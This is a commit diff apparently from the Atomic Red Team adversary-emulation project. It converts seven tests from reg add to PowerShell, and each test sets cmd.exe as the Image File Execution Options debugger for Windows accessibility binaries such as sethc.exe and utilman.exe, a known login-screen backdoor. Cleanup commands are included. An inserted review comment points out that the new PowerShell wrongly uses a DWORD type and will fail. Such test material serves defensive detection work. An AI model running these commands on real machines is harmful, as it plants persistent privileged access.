Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-01-06 21:07:55 +00:00
parent 7065f37725
commit 23285cf6cb
2 changed files with 353 additions and 70 deletions
+119 -14
@@ -48,12 +48,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
```
<br/>
<br/>
@@ -69,12 +84,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
```
<br/>
<br/>
@@ -90,12 +120,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
```
<br/>
<br/>
@@ -111,12 +156,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
```
<br/>
<br/>
@@ -132,12 +192,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
```
<br/>
<br/>
@@ -153,12 +228,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
```
<br/>
<br/>
@@ -174,11 +264,26 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force | Out-Null
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f
```
<br/>
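Review bot: The new PowerShell executor writes the Debugger value with `-PropertyType DWORD` while passing the string `C:\windows\system32\cmd.exe`, so the create branch will fail the type conversion, whereas the `reg add` line it replaces used `/t REG_SZ`; the same block appears in all seven hunks of this file and again in the second file from its first hunk onward. The ELSE branch also calls `New-ItemProperty` without `-Force`, so a re-run against an existing value errors instead of updating it. Since this file is generated, the fix belongs in the source atomic YAML rather than here: `New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType String -Force` in both branches. Note as well that the cleanup only removes the value; the key created by `New-Item` is left behind, which a defender testing the cleanup should expect.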
+234 -56
@@ -178,11 +178,23 @@ persistence:
type: String
default: osk.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
@@ -197,11 +209,23 @@ persistence:
type: String
default: sethc.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
@@ -216,11 +240,24 @@ persistence:
type: String
default: utilman.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
@@ -235,11 +272,24 @@ persistence:
type: String
default: magnify.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
@@ -254,11 +304,24 @@ persistence:
type: String
default: narrator.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
@@ -273,11 +336,24 @@ persistence:
type: String
default: DisplaySwitch.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
@@ -292,11 +368,24 @@ persistence:
type: String
default: atbroker.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force | Out-Null
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
/f
'
T1098:
@@ -12754,11 +12843,23 @@ privilege-escalation:
type: String
default: osk.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
@@ -12773,11 +12874,23 @@ privilege-escalation:
type: String
default: sethc.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
@@ -12792,11 +12905,24 @@ privilege-escalation:
type: String
default: utilman.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
@@ -12811,11 +12937,24 @@ privilege-escalation:
type: String
default: magnify.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
@@ -12830,11 +12969,24 @@ privilege-escalation:
type: String
default: narrator.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
@@ -12849,11 +13001,24 @@ privilege-escalation:
type: String
default: DisplaySwitch.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
@@ -12868,11 +13033,24 @@ privilege-escalation:
type: String
default: atbroker.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force | Out-Null
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
/f
'
'':